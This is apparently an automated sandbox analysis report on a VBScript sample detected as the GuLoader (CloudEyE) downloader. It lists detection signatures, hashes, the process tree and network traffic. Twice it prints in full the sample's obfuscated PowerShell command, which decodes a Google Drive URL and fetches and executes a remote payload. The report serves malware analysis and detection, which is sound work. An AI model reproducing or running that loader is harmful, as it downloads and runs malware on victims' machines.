Windows Analysis Report
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs

Overview

General Information

Sample name: 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs (renamed because original name is a hash value)
Original sample name: 11309-pdf.vbs
Analysis ID: 1522523
MD5: cd9505a0c492be1e52f012f624835147
SHA1: bece8abdda5efe16102c4c04d66cb1ab644b0046
SHA256: 9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0
Tags: vbs, user-abuse_ch

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre 
e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A 
cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. 
Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7432; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7432; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
      • 0x54861:$b2: ::FromBase64String(
      • 0x736da:$b2: ::FromBase64String(
      • 0x73710:$b2: ::FromBase64String(
      • 0x73747:$b2: ::FromBase64String(
      • 0x7377f:$b2: ::FromBase64String(
      • 0x737b8:$b2: ::FromBase64String(
      • 0x737f2:$b2: ::FromBase64String(
      • 0x7382d:$b2: ::FromBase64String(
      • 0x73869:$b2: ::FromBase64String(
      • 0x738a6:$b2: ::FromBase64String(
      • 0x738e4:$b2: ::FromBase64String(
      • 0x73923:$b2: ::FromBase64String(
      • 0x73963:$b2: ::FromBase64String(
      • 0x739a4:$b2: ::FromBase64String(
      • 0x739e6:$b2: ::FromBase64String(
      • 0x73a29:$b2: ::FromBase64String(
      • 0x10ecfc:$b2: ::FromBase64String(
      • 0x10fd25:$b2: ::FromBase64String(
      • 0x19c00c:$b2: ::FromBase64String(
      • 0x19c089:$b2: ::FromBase64String(
      • 0x1b5889:$b2: ::FromBase64String(
Source: amsi64_7432.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_7432.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
        • 0xe4ea:$b2: ::FromBase64String(
        • 0xd488:$s1: -join
        • 0x6c34:$s4: +=
        • 0x6cf6:$s4: +=
        • 0xaf1d:$s4: +=
        • 0xd03a:$s4: +=
        • 0xd324:$s4: +=
        • 0xd46a:$s4: +=
        • 0xf91d:$s4: +=
        • 0xf99d:$s4: +=
        • 0xfa63:$s4: +=
        • 0xfae3:$s4: +=
        • 0xfcb9:$s4: +=
        • 0xfd3d:$s4: +=
        • 0xdccc:$e4: Get-WmiObject
        • 0xdebb:$e4: Get-Process
        • 0xdf13:$e4: Start-Process

        System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", ProcessId: 180, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", ProcessId: 180, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArnery
        No Suricata rule has matched

        AV Detection

Source: http://pesterbdd.com/images/Pe; Virustotal: Detection: 6%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.4% probability
Source: unknown; HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[; source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbn8; source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT; source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbc; source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb=; source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: U'n.pdb; source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: drive.google.com
Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pe
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaWP
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
